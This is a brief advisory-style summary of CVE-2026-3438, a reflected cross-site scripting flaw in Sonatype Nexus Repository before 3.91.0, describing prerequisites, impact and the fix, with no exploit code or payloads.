CVE-2026-3438

Vulnerability

Overview

A reflected cross-site scripting (XSS) vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2. The flaw allows an unauthenticated remote attacker to inject arbitrary JavaScript into a victim's browser session by tricking the user into clicking a specially crafted URL. The root cause lies in insufficient sanitization of user-supplied input reflected in HTTP responses [1].

Exploitation

Prerequisites

Exploitation requires user interaction—the victim must click or otherwise open the malicious link. No authentication is needed to trigger the vulnerability, and the attack can be carried out over the network. The crafted URL can be delivered via phishing emails, forum posts, or other social engineering vectors [1].

Impact

Successful exploitation enables the attacker to execute arbitrary JavaScript in the context of the victim's of the victim's browser session with the Nexus Repository application. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites, depending on the attacker's payload and the victim's privileges within the repository [1].

Mitigation

Mitigation

Sonatype addressed this vulnerability in Nexus Repository version 3.91.0, released on April 7, 2026. Users are strongly advised to upgrade to 3.91.0 or later. No workarounds have been published for unpatched versions [1].